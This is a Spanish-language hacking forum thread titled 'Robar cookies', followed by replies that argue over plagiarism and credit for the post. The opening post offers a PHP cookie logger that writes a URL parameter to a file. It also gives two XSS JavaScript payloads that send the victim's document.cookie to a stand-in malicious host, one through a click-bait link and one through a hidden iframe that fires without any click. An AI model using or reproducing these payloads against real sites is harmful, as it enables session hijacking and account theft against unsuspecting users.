Robar cookies

<?php

$cookie = $_GET['NOMBRECOOKIE']; // Recibimos el valor del parámetro NOMBRECOOKIE
$conexion = fopen("cookies.txt", "a"); // Abrimos el archivo cookies.txt para escribir al final de él
fwrite($conexion, "$cookie"); // Escribimos el contenido almacenado en la variable $cookie
fclose($conexion); // Cerramos el archivo

?>

Ahora bien, esto no sirve para robar cookies. Con este código simplemente escribes el contenido de NOMBRECOOKIE en la URL (es decir, recibirías lo que hay aquí: smileysocultos.webcindario.com/?NOMBRECOOKIE=...valor...
Pero si entras en la página el usuario tendría que escribir su cookie manualmente en el parámetro, y sinceramente hay muchos lammers por el mundo pero no creo que encuentres muchos, y para eso es mejor decirle que te diga la cookie directamente xD

Otra cosa sería que encontraras un XSS  y hagas un enlace malicioso añadiendo la cookie con JavaScript al parámetro:
document.write('<a href="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'">Haz click aquí para...quedarte sin cuenta.</a>');

Claro, también puedes hacer que el proceso sea automático en el caso de encontrar un XSS y que el usuario no tenga que hacer click, simplemente inyectas un iframe oculto y listo:
document.write('<iframe src="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');

Fuente : iDarkHS - http://holoscripter.org/
- Saludos

Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos. 

Buen Post, Jeje yo Hice uno Parecido en DD [DestroyDreams]

Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos. 

Créditos: ndk

Fuente: Mi cerebro

Saludos

Cita de: Metadato en Agosto 23, 2013, 07:21:25 pm

Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos. 

Créditos: ndk

Fuente: Mi cerebro

Saludos

No es cierto, eso que has copiado y pegado es una respuesta del usuario de Holoscripter: iDarkHS,

Deja de rippear.

Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.

Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.

Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo Sankete!!!

Cita de: Sanko en Agosto 24, 2013, 07:19:48 am

Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.

Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo Sankete!!!

Totalmente de acuerdo, un saludo compa.

Como dijeron mas arriba, este post esta rippeado, y no solo eso, sino que dices que es tuyo?

El post es de iDarkHS: http://holoscripter.org/foro/index.php?topic=571.msg1925#msg1925

Agrega el autor y la fuente y deja de decir que es tuyo.